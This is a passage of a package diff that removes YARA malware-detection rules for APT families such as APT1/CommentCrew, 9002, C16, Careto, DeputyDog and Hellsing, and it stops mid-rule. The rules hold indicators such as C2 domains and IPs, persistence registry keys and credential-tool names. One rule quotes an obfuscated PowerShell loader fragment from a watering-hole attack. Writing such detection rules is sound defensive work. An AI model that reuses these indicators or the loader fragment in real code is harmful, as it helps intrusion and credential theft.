-    $a = {DD B5 61 F0 20 47 20 57 D6 65 9C CB 31 1B 65 42}
-
-  condition:
-    any of them
-}
-
-rule ccrewDownloader2
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "3gZFQOBtY3sifNOl" wide ascii
-        $b = "docbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD" wide ascii
-        $c = "6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJ" wide ascii
-
-  condition:
-    any of them
-}
-
-
-rule ccrewMiniasp
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "MiniAsp.pdb" wide ascii
-    $b = "device_t=" wide ascii
-
-  condition:
-    any of them
-}
-
-
-rule ccrewSSLBack2
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = {39 82 49 42 BE 1F 3A}
-
-  condition:
-    any of them
-}
-
-rule ccrewSSLBack3
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "SLYHKAAY" wide ascii
-
-  condition:
-    any of them
-}
-
-
-rule ccrewSSLBack1
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "!@#%$^#@!" wide ascii
-    $b = "64.91.80.6" wide ascii
-
-  condition:
-    any of them
-}
-
-rule ccrewDownloader3
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "ejlcmbv" wide ascii
-        $b = "bhxjuisv" wide ascii
-        $c = "yqzgrh" wide ascii
-        $d = "uqusofrp" wide ascii
-        $e = "Ljpltmivvdcbb" wide ascii
-        $f = "frfogjviirr" wide ascii
-        $g = "ximhttoskop" wide ascii
-  condition:
-    4 of them
-}
-
-
-rule ccrewQAZ
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "!QAZ@WSX" wide ascii
-
-  condition:
-    $a
-}
-
-rule metaxcd
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "<meta xcd=" wide ascii
-
-  condition:
-    $a
-}
-
-rule MiniASP
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-strings:
-    $KEY = { 71 30 6E 63 39 77 38 65 64 61 6F 69 75 6B 32 6D 7A 72 66 79 33 78 74 31 70 35 6C 73 36 37 67 34 62 76 68 6A }
-    $PDB = "MiniAsp.pdb" nocase wide ascii
-
-condition:
-    any of them
-}
-
-rule DownloaderPossibleCCrew
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-  strings:
-    $a = "%s?%.6u" wide ascii
-    $b = "szFileUrl=%s" wide ascii
-    $c = "status=%u" wide ascii
-    $d = "down file success" wide ascii
-        $e = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" wide ascii
-
-  condition:
-    all of them
-}
-
-rule APT1_MAPIGET
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $s1 = "%s\\Attachment.dat" wide ascii
-        $s2 = "MyOutlook" wide ascii
-        $s3 = "mail.txt" wide ascii
-        $s4 = "Recv Time:" wide ascii
-        $s5 = "Subject:" wide ascii
-
-    condition:
-        all of them
-}
-
-rule APT1_LIGHTBOLT
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $str1 = "bits.exe" wide ascii
-        $str2 = "PDFBROW" wide ascii
-        $str3 = "Browser.exe" wide ascii
-        $str4 = "Protect!" wide ascii
-    condition:
-        2 of them
-}
-
-rule APT1_GETMAIL
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $stra1 = "pls give the FULL path" wide ascii
-        $stra2 = "mapi32.dll" wide ascii
-        $stra3 = "doCompress" wide ascii
-
-        $strb1 = "getmail.dll" wide ascii
-        $strb2 = "doCompress" wide ascii
-        $strb3 = "love" wide ascii
-    condition:
-        all of ($stra*) or all of ($strb*)
-}
-
-rule APT1_GDOCUPLOAD
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $str1 = "name=\"GALX\"" wide ascii
-        $str2 = "User-Agent: Shockwave Flash" wide ascii
-        $str3 = "add cookie failed..." wide ascii
-        $str4 = ",speed=%f" wide ascii
-    condition:
-        3 of them
-}
-
-rule APT1_WEBC2_Y21K
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $1 = "Y29ubmVjdA" wide ascii // connect
-        $2 = "c2xlZXA" wide ascii // sleep
-        $3 = "cXVpdA" wide ascii // quit
-        $4 = "Y21k" wide ascii // cmd
-        $5 = "dW5zdXBwb3J0" wide ascii // unsupport
-    condition:
-        4 of them
-}
-
-rule APT1_WEBC2_YAHOO
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $http1 = "HTTP/1.0" wide ascii
-        $http2 = "Content-Type:" wide ascii
-        $uagent = "IPHONE8.5(host:%s,ip:%s)" wide ascii
-    condition:
-        all of them
-}
-
-rule APT1_WEBC2_UGX
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" wide ascii
-        $exe = "DefWatch.exe" wide ascii
-        $html = "index1.html" wide ascii
-        $cmd1 = "!@#tiuq#@!" wide ascii
-        $cmd2 = "!@#dmc#@!" wide ascii
-        $cmd3 = "!@#troppusnu#@!" wide ascii
-    condition:
-        3 of them
-}
-
-rule APT1_WEBC2_TOCK
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $1 = "InprocServer32" wide ascii
-        $2 = "HKEY_PERFORMANCE_DATA" wide ascii
-        $3 = "<!---[<if IE 5>]id=" wide ascii
-    condition:
-        all of them
-}
-
-rule APT1_WEBC2_TABLE
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $msg1 = "Fail To Execute The Command" wide ascii
-        $msg2 = "Execute The Command Successfully" wide ascii
-        /*
-	$gif1 = /\w+\.gif/
-	*/
-        $gif2 = "GIF89" wide ascii
-    condition:
-        3 of them
-}
-
-rule APT1_WEBC2_RAVE
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $1 = "iniet.exe" wide ascii
-        $2 = "cmd.exe" wide ascii
-        $3 = "SYSTEM\\CurrentControlSet\\Services\\DEVFS" wide ascii
-        $4 = "Device File System" wide ascii
-    condition:
-        3 of them
-}
-
-rule APT1_WEBC2_QBP
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $1 = "2010QBP" wide ascii
-        $2 = "adobe_sl.exe" wide ascii
-        $3 = "URLDownloadToCacheFile" wide ascii
-        $4 = "dnsapi.dll" wide ascii
-        $5 = "urlmon.dll" wide ascii
-    condition:
-        4 of them
-}
-
-rule APT1_WEBC2_HEAD
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $1 = "Ready!" wide ascii
-        $2 = "connect ok" wide ascii
-        $3 = "WinHTTP 1.0" wide ascii
-        $4 = "<head>" wide ascii
-    condition:
-        all of them
-}
-
-rule APT1_WEBC2_GREENCAT
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $1 = "reader_sl.exe" wide ascii
-        $2 = "MS80547.bat" wide ascii
-        $3 = "ADR32" wide ascii
-        $4 = "ControlService failed!" wide ascii
-    condition:
-        3 of them
-}
-
-rule APT1_WEBC2_DIV
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $1 = "3DC76854-C328-43D7-9E07-24BF894F8EF5" wide ascii
-        $2 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide ascii
-        $3 = "Hello from MFC!" wide ascii
-        $4 = "Microsoft Internet Explorer" wide ascii
-    condition:
-        3 of them
-}
-
-rule APT1_WEBC2_CSON
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $httpa1 = "/Default.aspx?INDEX=" wide ascii
-        $httpa2 = "/Default.aspx?ID=" wide ascii
-        $httpb1 = "Win32" wide ascii
-        $httpb2 = "Accept: text*/*" wide ascii
-        $exe1 = "xcmd.exe" wide ascii
-        $exe2 = "Google.exe" wide ascii
-    condition:
-        1 of ($exe*) and 1 of ($httpa*) and all of ($httpb*)
-}
-
-rule APT1_WEBC2_CLOVER
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $msg1 = "BUILD ERROR!" wide ascii
-        $msg2 = "SUCCESS!" wide ascii
-        $msg3 = "wild scan" wide ascii
-        $msg4 = "Code too clever" wide ascii
-        $msg5 = "insufficient lookahead" wide ascii
-        $ua1 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)" wide ascii
-        $ua2 = "Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12" wide ascii
-    condition:
-        2 of ($msg*) and 1 of ($ua*)
-}
-
-rule APT1_WEBC2_BOLID
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $vm = "VMProtect" wide ascii
-        $http = "http://[c2_location]/[page].html" wide ascii
-    condition:
-        all of them
-}
-
-rule APT1_WEBC2_ADSPACE
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $1 = "<!---HEADER ADSPACE style=" wide ascii
-        $2 = "ERSVC.DLL" wide ascii
-    condition:
-        all of them
-}
-
-rule APT1_WEBC2_AUSOV
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $1 = "ntshrui.dll" wide ascii
-        $2 = "%SystemRoot%\\System32\\" wide ascii
-        $3 = "<!--DOCHTML" wide ascii
-        $4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" wide ascii
-        $5 = "Ausov" wide ascii
-    condition:
-        4 of them
-}
-
-rule APT1_WARP
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $err1 = "exception..." wide ascii
-        $err2 = "failed..." wide ascii
-        $err3 = "opened..." wide ascii
-        $exe1 = "cmd.exe" wide ascii
-        $exe2 = "ISUN32.EXE" wide ascii
-    condition:
-        2 of ($err*) and all of ($exe*)
-}
-
-rule APT1_TARSIP_ECLIPSE
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $1 = "\\pipe\\ssnp" wide ascii
-        $2 = "toobu.ini" wide ascii
-        $3 = "Serverfile is not bigger than Clientfile" wide ascii
-        $4 = "URL download success" wide ascii
-    condition:
-        3 of them
-}
-
-rule APT1_TARSIP_MOON
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $s1 = "\\XiaoME\\SunCloud-Code\\moon" wide ascii
-        $s2 = "URL download success!" wide ascii
-        $s3 = "Kugoosoft" wide ascii
-        $msg1 = "Modify file failed!! So strange!" wide ascii
-        $msg2 = "Create cmd process failed!" wide ascii
-        $msg3 = "The command has not been implemented!" wide ascii
-        $msg4 = "Runas success!" wide ascii
-        $onec1 = "onec.php" wide ascii
-        $onec2 = "/bin/onec" wide ascii
-    condition:
-        1 of ($s*) and 1 of ($msg*) and 1 of ($onec*)
-}
-
-rule APT1_payloads
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $pay1 = "rusinfo.exe" wide ascii
-        $pay2 = "cmd.exe" wide ascii
-        $pay3 = "AdobeUpdater.exe" wide ascii
-        $pay4 = "buildout.exe" wide ascii
-        $pay5 = "DefWatch.exe" wide ascii
-        $pay6 = "d.exe" wide ascii
-        $pay7 = "em.exe" wide ascii
-        $pay8 = "IMSCMig.exe" wide ascii
-        $pay9 = "localfile.exe" wide ascii
-        $pay10 = "md.exe" wide ascii
-        $pay11 = "mdm.exe" wide ascii
-        $pay12 = "mimikatz.exe" wide ascii
-        $pay13 = "msdev.exe" wide ascii
-        $pay14 = "ntoskrnl.exe" wide ascii
-        $pay15 = "p.exe" wide ascii
-        $pay16 = "otepad.exe" wide ascii
-        $pay17 = "reg.exe" wide ascii
-        $pay18 = "regsvr.exe" wide ascii
-        $pay19 = "runinfo.exe" wide ascii
-        $pay20 = "AdobeUpdate.exe" wide ascii
-        $pay21 = "inetinfo.exe" wide ascii
-        $pay22 = "svehost.exe" wide ascii
-        $pay23 = "update.exe" wide ascii
-        $pay24 = "NTLMHash.exe" wide ascii
-        $pay25 = "wpnpinst.exe" wide ascii
-        $pay26 = "WSDbg.exe" wide ascii
-        $pay27 = "xcmd.exe" wide ascii
-        $pay28 = "adobeup.exe" wide ascii
-        $pay29 = "0830.bin" wide ascii
-        $pay30 = "1001.bin" wide ascii
-        $pay31 = "a.bin" wide ascii
-        $pay32 = "ISUN32.EXE" wide ascii
-        $pay33 = "AcroRD32.EXE" wide ascii
-        $pay34 = "INETINFO.EXE" wide ascii
-    condition:
-        1 of them
-}
-
-
-rule APT1_RARSilent_EXE_PDF
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $winrar1 = "WINRAR.SFX" wide ascii
-        /*
-        $winrar2 = ";The comment below contains SFX script commands" wide ascii
-        $winrar3 = "Silent=1" wide ascii
-	*/
-
-        /*$str1 = /Setup=[\s\w\"]+\.(exe|pdf|doc)/
-	*/
-        $str2 = "Steup=\"" wide ascii
-    condition:
-        all of ($winrar*) and 1 of ($str*)
-}
-
-rule APT1_aspnetreport
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $url = "aspnet_client/report.asp" wide ascii
-        $param = "name=%s&Gender=%c&Random=%04d&SessionKey=%s" wide ascii
-    condition:
-        $url and $param and APT1_payloads
-}
-
-rule APT1_Revird_svc
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $dll1 = "nwwwks.dll" wide ascii
-        $dll2 = "rdisk.dll" wide ascii
-        $dll3 = "skeys.dll" wide ascii
-        $dll4 = "SvcHost.DLL.log" wide ascii
-        $svc1 = "InstallService" wide ascii
-        $svc2 = "RundllInstallA" wide ascii
-        $svc3 = "RundllUninstallA" wide ascii
-        $svc4 = "ServiceMain" wide ascii
-        $svc5 = "UninstallService" wide ascii
-    condition:
-        1 of ($dll*) and 2 of ($svc*)
-}
-
-rule APT1_dbg_mess
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $dbg1 = "Down file ok!" wide ascii
-        $dbg2 = "Send file ok!" wide ascii
-        $dbg3 = "Command Error!" wide ascii
-        $dbg4 = "Pls choose target first!" wide ascii
-        $dbg5 = "Alert!" wide ascii
-        $dbg6 = "Pls press enter to make sure!" wide ascii
-        $dbg7 = "Are you sure to " wide ascii
-    condition:
-        4 of them and APT1_payloads
-}
-
-rule APT1_known_malicious_RARSilent
-{
-    meta:
-        author = "AlienVault Labs"
-        info = "CommentCrew-threat-apt1"
-
-    strings:
-        $str1 = "Analysis And Outlook.doc\"" wide ascii
-        $str2 = "North Korean launch.pdf\"" wide ascii
-        $str3 = "Dollar General.doc\"" wide ascii
-        $str4 = "Dow Corning Corp.pdf\"" wide ascii
-    condition:
-        1 of them and APT1_RARSilent_EXE_PDF
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/APT3102.yara remnux-rules-0.0.4/yara/APT3102.yara
--- remnux-rules-0.0.3/yara/APT3102.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT3102.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,36 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule APT3102Code : APT3102 Family 
-{
-    meta:
-        description = "3102 code features"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    strings:
-        $setupthread = { B9 02 07 00 00 BE ?? ?? ?? ?? 8B F8 6A 00 F3 A5 }
-  
-    condition:
-        any of them
-}
-
-rule APT3102Strings : APT3102 Family
-{
-    meta:
-        description = "3102 Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    strings:
-        $ = "rundll32_exec.dll\x00Update"
-        // this is in the encrypted code - shares with 9002 variant
-        //$ = "POST http://%ls:%d/%x HTTP/1.1"
-        
-    condition:
-       any of them
-}
diff -Nru remnux-rules-0.0.3/yara/APT9002.yara remnux-rules-0.0.4/yara/APT9002.yara
--- remnux-rules-0.0.3/yara/APT9002.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT9002.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,71 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule APT9002Code : APT9002 Family 
-{
-    meta:
-        description = "9002 code features"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    strings:
-        // start code block
-        $ = { B9 7A 21 00 00 BE ?? ?? ?? ?? 8B F8 ?? ?? ?? F3 A5 }
-        // decryption from other variant with multiple start threads
-        $ = { 8A 14 3E 8A 1C 01 32 DA 88 1C 01 8B 54 3E 04 40 3B C2 72 EC }
-  
-    condition:
-        any of them
-}
-
-rule APT9002Strings : APT9002 Family
-{
-    meta:
-        description = "9002 Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    strings:
-        $ = "POST http://%ls:%d/%x HTTP/1.1"
-        $ = "%%TEMP%%\\%s_p.ax" wide ascii
-        $ = "%TEMP%\\uid.ax" wide ascii
-        $ = "%%TEMP%%\\%s.ax" wide ascii
-        // also triggers on surtr $ = "mydll.dll\x00DoWork"
-        $ = "sysinfo\x00sysbin01"
-        $ = "\\FlashUpdate.exe"
-        
-    condition:
-       any of them
-}
-
-rule APT9002 : Family
-{
-    meta:
-        description = "9002"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    condition:
-        APT9002Code or APT9002Strings
-}
-
-rule FE_APT_9002 : RAT
-{
-    meta:
-        Author      = "FireEye Labs"
-        Date        = "2013/11/10"
-        Description = "Strings inside"
-        Reference   = "Useful link"
-
-    strings:
-        $mz = { 4d 5a }
-        $a = "rat_UnInstall" wide ascii
-
-    condition:
-        ($mz at 0) and $a
-}
-
diff -Nru remnux-rules-0.0.3/yara/APT_c16.yara remnux-rules-0.0.4/yara/APT_c16.yara
--- remnux-rules-0.0.3/yara/APT_c16.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_c16.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,98 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule apt_c16_win_memory_pcclient 
-{
-  meta:
-    author = "@dragonthreatlab "
-    md5 = "ec532bbe9d0882d403473102e9724557"
-    description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
-  strings:
-    $str1 = "Kill You" ascii
-    $str2 = "%4d-%02d-%02d %02d:%02d:%02d" ascii
-    $str3 = "%4.2f  KB" ascii
-    $encodefunc = {8A 08 32 CA 02 CA 88 08 40 4E 75 F4}  
-  condition:
-    all of them
-}
-
-rule apt_c16_win_disk_pcclient 
-{
-  meta:
-    author = "@dragonthreatlab "
-    md5 = "55f84d88d84c221437cd23cdbc541d2e"
-    description = "Encoded version of pcclient found on disk"
-  strings:
-    $header = {51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06}
-  condition:
-    $header at 0
-}
-
-rule apt_c16_win32_dropper 
-{
-  meta:
-    author = "@dragonthreatlab"
-    md5 = "ad17eff26994df824be36db246c8fb6a"
-    description = "APT malware used to drop PcClient RAT"
-  strings:
-    $mz = {4D 5A}
-    $str1 = "clbcaiq.dll" ascii
-    $str2 = "profapi_104" ascii
-    $str3 = "/ShowWU" ascii
-    $str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii
-    $str5 = {8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E}
-  condition:
-    $mz at 0 and all of ($str*)
-}
-
-rule apt_c16_win_swisyn 
-{
-  meta:
-    author = "@dragonthreatlab"
-    md5 = "a6a18c846e5179259eba9de238f67e41"
-    description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
-  strings:
-    $mz = {4D 5A}
-    $str1 = "/ShowWU" ascii
-    $str2 = "IsWow64Process"
-    $str3 = "regsvr32 "
-    $str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10}
-  condition:
-    $mz at 0 and all of ($str*)
-}
-
-rule apt_c16_win_wateringhole 
-{
-  meta:
-    author = "@dragonthreatlab "
-    description = "Detects code from APT wateringhole"
-  strings:
-    $str1 = "function runmumaa()"
-    $str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
-    $str3 = "function MoSaklgEs7(k)"
-  condition:
-    any of ($str*)
-}
-
-rule apt_c16_win64_dropper
-{
-    meta:
-        Author      = "@dragonthreatlab"
-        Date        = "2015/01/11" 
-        Description = "APT malware used to drop PcClient RAT"
-        Reference   = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
-
-    strings:
-        $mz = { 4D 5A }
-        $str1 = "clbcaiq.dll" ascii
-        $str2 = "profapi_104" ascii
-        $str3 = "\\Microsoft\\wuauclt\\wuauclt.dat" ascii
-        $str4 = { 0F B6 0A 48 FF C2 80 E9 03 80 F1 03 49 FF C8 88 4A FF 75 EC }
-
-    condition:
-        $mz at 0 and all of ($str*)
-}
diff -Nru remnux-rules-0.0.3/yara/APT_Careto.yara remnux-rules-0.0.4/yara/APT_Careto.yara
--- remnux-rules-0.0.3/yara/APT_Careto.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_Careto.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,59 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Careto_SGH {
-	meta:
-		author = "AlienVault (Alberto Ortega)"
-		description = "TheMask / Careto SGH component signature"
-		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
-	strings:
-		$m1 = "PGPsdkDriver" ascii wide fullword
-		$m2 = "jpeg1x32" ascii wide fullword
-		$m3 = "SkypeIE6Plugin" ascii wide fullword
-		$m4 = "CDllUninstall" ascii wide fullword
-	condition:
-		2 of them
-}
-
-rule Careto_OSX_SBD {
-	meta:
-		author = "AlienVault (Alberto Ortega)"
-		description = "TheMask / Careto OSX component signature"
-		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
-	strings:
-		/* XORed "/dev/null strdup() setuid(geteuid())" */
-		$1 = {FF 16 64 0A 7E 1A 63 4D 21 4D 3E 1E 60 0F 7C 1A 65 0F 74 0B 3E 1C 7F 12}
-	condition:
-		all of them
-}
-
-rule Careto_CnC {
-	meta:
-		author = "AlienVault (Alberto Ortega)"
-		description = "TheMask / Careto CnC communication signature"
-		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
-	strings:
-		$1 = "cgi-bin/commcgi.cgi" ascii wide
-		$2 = "Group" ascii wide
-		$3 = "Install" ascii wide
-		$4 = "Bn" ascii wide
-	condition:
-		all of them
-}
-
-rule Careto_CnC_domains {
-	meta:
-		author = "AlienVault (Alberto Ortega)"
-		description = "TheMask / Careto known command and control domains"
-		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
-	strings:
-		$1 = "linkconf.net" ascii wide nocase
-		$2 = "redirserver.net" ascii wide nocase
-		$3 = "swupdt.com" ascii wide nocase
-	condition:
-		any of them
-}
diff -Nru remnux-rules-0.0.3/yara/APT_DeputyDog_Fexel.yara remnux-rules-0.0.4/yara/APT_DeputyDog_Fexel.yara
--- remnux-rules-0.0.3/yara/APT_DeputyDog_Fexel.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_DeputyDog_Fexel.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,36 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule APT_DeputyDog_Fexel
-{
-meta:
-	author = "ThreatConnect Intelligence Research Team"
-strings:
-	$180 = "180.150.228.102" wide ascii
-	$0808cmd = {25 30 38 78 30 38 78 00 5C 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 [2-6] 43 00 61 00 6E 00 27 00 74 00 20 00 6F 00 70 00 65 00 6E 00 20 00 73 00 68 00 65 00 6C 00 6C 00 21}
-	$cUp = "Upload failed! [Remote error code:" nocase wide ascii
-	$DGGYDSYRL = {00 44 47 47 59 44 53 59 52 4C 00}
-	$GDGSYDLYR = "GDGSYDLYR_%" wide ascii
-condition:
-	any of them
-}
-
-rule APT_DeputyDog
-{
-    meta:
-        Author      = "FireEye Labs"
-        Date        = "2013/09/21"
-        Description = "detects string seen in samples used in 2013-3893 0day attacks"
-        Reference   = "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
-
-    strings:
-        $mz = {4d 5a}
-        $a = "DGGYDSYRL"
-
-    condition:
-        ($mz at 0) and $a
-}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/APT_Hellsing.yara remnux-rules-0.0.4/yara/APT_Hellsing.yara
--- remnux-rules-0.0.3/yara/APT_Hellsing.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/APT_Hellsing.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,159 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-rule apt_hellsing_implantstrings : PE
-{ 
-	meta:
-		Author		= "Costin Raiu, Kaspersky Lab"
-		Date		= "2015-04-07"
-		Description	= "detection for Hellsing implants"
-		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
-
-	strings: 
-		$mz="MZ"
-
-		$a1="the file uploaded failed !" 
-		$a2="ping 127.0.0.1"
-		
-		$b1="the file downloaded failed !" 
-		$b2="common.asp"
-		
-		$c="xweber_server.exe" 
-		$d="action="
-
-		$debugpath1="d:\\Hellsing\\release\\msger\\" nocase 
-		$debugpath2="d:\\hellsing\\sys\\xrat\\" nocase 
-		$debugpath3="D:\\Hellsing\\release\\exe\\" nocase 
-		$debugpath4="d:\\hellsing\\sys\\xkat\\" nocase 
-		$debugpath5="e:\\Hellsing\\release\\clare" nocase 
-		$debugpath6="e:\\Hellsing\\release\\irene\\" nocase 
